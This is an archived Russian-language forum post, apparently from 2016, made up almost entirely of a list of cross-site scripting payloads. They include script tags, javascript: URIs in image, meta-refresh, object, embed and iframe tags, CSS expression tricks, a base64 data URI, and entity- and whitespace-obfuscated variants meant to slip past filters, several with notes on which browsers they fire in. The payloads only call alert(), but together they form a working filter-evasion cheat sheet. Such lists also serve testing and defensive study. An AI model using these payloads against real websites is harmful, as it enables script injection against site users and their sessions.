Архив форума ЛГ - <META HTTP-EQUIV="Refresh" CONTENT=3; URL=javascript:alert('lol')"> <img src=images/smile.gif onload=alert('lol')> onerror="при возникновении ошибки"; onmouseover="при наведении курсора мышки&q

<META HTTP-EQUIV="Refresh" CONTENT=3; URL=javascript:alert('lol')"> <img src=images/smile.gif onload=alert('lol')> onerror="при возникновении ошибки"; onmouseover="при наведении курсора мышки&q

Назад к темам раздела.

2016-05-30 17:17:53

<META HTTP-EQUIV="Refresh" CONTENT=3; URL=javascript:alert('lol')">
<img src=images/

onload=alert('lol')>
onerror="при возникновении ошибки";
onmouseover="при наведении курсора мышки";
onmouseout="при убратии курсора с объекта";
<image/src="1.png"/alt="Подсказка"/border="0">
<image src="1.png" alt="Подсказка" border="0">
<image
src="1.png"
alt="Подсказка"
border="0">
<image src="1.png"alt="Подсказка"border="0">
<SCRIPT>alert(/message/)</SCRIPT>
<IMG SRC="JaVaScRiPt:aLeRt('message')">
<<IMG SRC=javascript:alert('message')//>
<<SCRIPT>alert('message')//<</SCRIPT>
</TITLE><SCRIPT>alert("message");</SCRIPT>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgneGFrbmV0LnJ1Jyk8L3NjcmlwdD4=">
<img src=javascript:alert("ok")>
<img src=javascript:alert('ok')>
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#111&#107&#39&#41>
<a href=javascript:alert(%22ok%22)>click me</a> (только в атрибуте href)
<script>alert('ok')</script>
<script src=1.js></script>
<body onLoad=alert('ok')>
<meta http-equiv=Refresh content=0;url=javascript:alert('ok')>
<image src=1.png onload=alert('ok')>
<image src=javascript:alert('ok')>
<image src="" onerror=alert('ok')>
<hr style=background:url(javascript:alert('ok'))>
<span style=top:expression(alert('ok'))></span>
<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span> (срабатывает только один раз)
<style type="text/css">@import url(javascript:alert('ok'));</style>
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>
<embed src=javascript:alert('ok');this.avi>
<embed src=javascript:alert('ok');this.wav>
<iframe src=javascript:alert('ok')> (только в IE)
<a href=javascript:alert(%22ok%22)>click me</a> (запуск только при клике по ссылке)
<a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a> (запуск только при клике по ссылке)
<br SIZE="&{alert('XSS')}"> (только Netscape 4.x)
<img src=javascript:alert()>
<img src=vbscript:AleRt()>
<img src=JaVasCriPt:alert()>
<img src=" javascript:alert()"> (пробелы до слова javascript)
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>
<img src=javascript&#9:alert()>
<img src=javascript&#10:alert()>
<img src=javascript&#13:alert()>
<img src="javascript :alert()"> (перед двоеточием - символ табуляции)
<img src="java scri
pt:ale rt()"> (внутри слова javascript - символ табуляции и возврат каретки)